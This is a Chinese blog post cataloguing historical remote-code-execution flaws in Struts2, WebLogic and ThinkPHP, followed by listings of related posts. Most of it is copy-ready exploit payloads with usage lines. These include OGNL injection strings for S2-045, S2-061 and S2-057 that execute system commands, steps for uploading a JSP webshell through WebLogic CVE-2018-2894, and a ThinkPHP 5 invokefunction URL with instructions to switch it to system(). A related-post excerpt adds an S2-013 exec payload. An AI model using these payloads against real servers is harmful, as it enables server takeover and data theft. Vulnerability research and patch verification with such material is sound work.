Struts2+Weblogic+ThinkPHP三大主流框架中间件历史漏洞(手工验证)

已于 2022-08-23 00:06:18 修改
阅读量726 收藏 2
点赞数 3
文章标签: struts java 后端 网络安全 web安全
于 2022-06-20 15:57:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44433172/article/details/125373909
版权

Struts2+Weblogic+ThinkPHP三大主流框架中间件历史漏洞

Struts2 框架漏洞

S2-045 CVE-2017-5638

影响版本:Struts 2.3.5 -2.3.31,2.5 -2.5.10
用法:Content-Type :POC

POC:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

S2-061 CVE-2020-17530

影响版本:Struts 2.0.0 -2.5.25
用法:url/?id=POC

POC:%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec+=+#application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'whoami'}).(#res=#exec.exec(#cmd))}

S2-057 CVE-2018-11776

影响版本:Struts 2.3 - 2.3.34,2.5 - 2.5.16
用法:url/POC

POC:/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}/

Weblogic 中间件漏洞

CVE-2017-10271

漏洞名称:WebLogic XMLDecoder反序列化漏洞
影响版本:
 10.3.6.0.0
 12.1.3.0.0
 12.2.1.1.0
 12.2.1.2.0
漏洞地址:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

CVE-2018-2894

漏洞名称:Weblogic 任意文件上传漏洞
影响版本:
 10.3.6.0
 12.1.3.0
 12.2.1.2
 12.2.1.3
利用过程:

1、访问访问http://127.0.0.1:7001/ws_utc/config.do
2、然后上传jsp一句话木马,并查看时间戳
3、http://127.0.0.1:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

ThinkPHP 框架漏洞

ThinkPHP 5.0.22/5.1.29 远程代码执行

漏洞名称:ThinkPHP5 5.0.22/5.1.29 远程代码执行
用法:url/POC

POC:/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

介绍:系统命令执行将vars[0]的phpinfo改成system,vars[1][]的值改成系统命令

曲自清
关注
【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具
时光隧道
05-12 9765
HW护网行动攻防演练是一种针对网络安全的实践活动,用于测试和提高组织的网络安全防御和攻击能力。通过模拟真实的网络攻击和防御行动,演练参与者在紧张压力下的反应和解决问题的能力,发现网络安全漏洞和提高安全意识,加强网络安全防御能力。攻防演练的成员组成一般包括攻击者、防御者和观察者三个角色。攻击者的任务是模拟真实的黑客攻击,找出系统的漏洞并利用其进行攻击,以检验系统的安全性。防御者则负责发现和修补漏洞,并保护系统不受攻击。观察者则负责记录和分析整个攻防过程,并提供建议和改进意见。
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
struts2-验证(手工)
weixin_30546933的博客
05-17 113
struts2校验有两种实现方法:   1. 手工编写代码实现(基本验证)    2. 基于XML配置方式实现(验证框架) 基本验证(对action的所有方法进行校验)    Action中 * 要继承ActionSupport * 重写Validateable接口中的validate()方法 ,在该方法中完成验证 * 步骤如下:   * validate...
WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复
最新发布
baimao__Ch的博客
09-14 941
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Weblogic漏洞
周星星的博客
09-05 2498
中间件漏洞weblogic漏洞初步学习,后续继续复现相关漏洞
框架中间件漏洞
niqiu320的博客
04-23 827
Struts 2漏洞简介 Apache Struts 2 最初被称为Webwork2,它是一个简洁的,可扩展的框架,可用于创建企业级java web应用程序,设计这个框架是为了从构建,部署,到应用程序维护方面来简化整个开发周期。 Struts2漏洞是一个远程命令执行漏洞和开放重定向漏洞,利用漏洞, 黑客可发起远程攻击,不但可以获取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,攻击者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作
WebLogic漏洞复现(附带修复方法)
C233333235的博客
08-07 2059
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 743
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
第61天-服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
2303_79055586的博客
05-02 1050
相关工具链接链接:https://pan.baidu.com/s/1a6Zt4e96rk87Kz0Gpzepig提取码:ospa。
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 9441
一直没有系统的总结过 weblogic漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
weblogic系列漏洞整理 ———— 3. weblogic 后台提权
Fly_鹏程万里
11-01 2064
提权思路 weblogic是一个基于JavaEE的中间件,它可以解析jsp代码,当我们知道后台密码之后,即可登陆weblogic后台,上传恶意war包,从而进行提权操作。 漏洞利用过程 登陆weblogic后台 http://192.168.11.178:7001/console,进取之后点击左侧的部署,在弹出来的右侧页面点击“安装” 在安装页面选择“上载文件”: 在 “将部署上...
常见中间件漏洞(上)
qq_44768719的博客
11-14 1802
iis: 1.put漏洞 原因:在web服务扩展中开启了webDAV,配置了可以任意写入的权限 。 判断方法:将get请求改为options,根据返回的报文判断是否允许put方法 利用:可以用工具使用,自行百度 2.短文件名猜解: 原因:访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 利用形式:需要用到通配符,*可以匹配n个字符,也可以为0个。 举例:1. http://www.target.com/*~1****/a.aspx 2. http://www.t
Weblogic系列漏洞之——XML Decoder反序列化漏洞(CVE-2017-10271)
Stephen Wolf
12-11 796
一、漏洞描述: CVE-2017-10271漏洞产生的原因是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 影响版本:10.3.6.0,12.1.3.0.0,...
中间件Struts2系列漏洞POC小结
weixin_30852367的博客
05-16 295
#Struts2-045 ''' CVE-2017-5638 影响范围:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 – Struts 2.5.10 触发条件:基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行 利用方法:构造Content-type的值 测试POC: %{(#nike='multipart/form-...
java struts2 漏洞_Struts2漏洞利用
weixin_34837898的博客
02-13 762
Struts漏洞合集Struts-S2-013漏洞利用受影响版本Struts 2.0.0 - Struts 2.3.14.1漏洞利用任意命令执行POC:${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java...
[WEB安全]Weblogic漏洞总结
baguangman5501的博客
09-12 1308
0x01 Weblogic简介 1.1 叙述 Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 WeblogicJava的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发...
thinkphp6.0漏洞复现
qq_44657899的博客
01-19 8452
环境搭建 我打算安装在kali上面,首先下载tp6到kali上 // 1. 下载composer.phar: curl -sS https://getcomposer.org/installer | php // 2. 将 composer 命令移动到bin目录,使之全局可用 mv composer.phar /usr/local/bin/composer // 3. 设置中国全量镜像,提升访问速度 composer config -g repo.packagist composer ht
ThinkPHP 6.0.1 漏洞分析(任意文件操作)
god_Zeo的安全博客
02-12 5264
漏洞描述 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 具体受影响版 ThinkPHP6.0.0-6.0.1。 环境准备 /tp60/app/middleware.php 文件开启session 去掉se...
介绍一些 Weblogic 常见的漏洞
CSDN大数据
05-24 881
介绍 Weblogic 常见的漏洞,其中包括:弱口令、Java 反序列化、XMLdecoder 反序列化、SSRF 漏洞、任意文件上传,并根据其漏洞,使用 Docker+...
Struts2+Spring+Hibernate在WebLogic 8.1.6上的部署配置详解
"这篇文章主要介绍了如何将Struts2、Spring和Hibernate框架整合的应用部署到WebLogic 8.1.6服务器上所需的jar包以及配置步骤。在部署过程中,需要注意JDK版本的兼容性,WebLogic使用的JDK版本是1.4,而Struts2可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值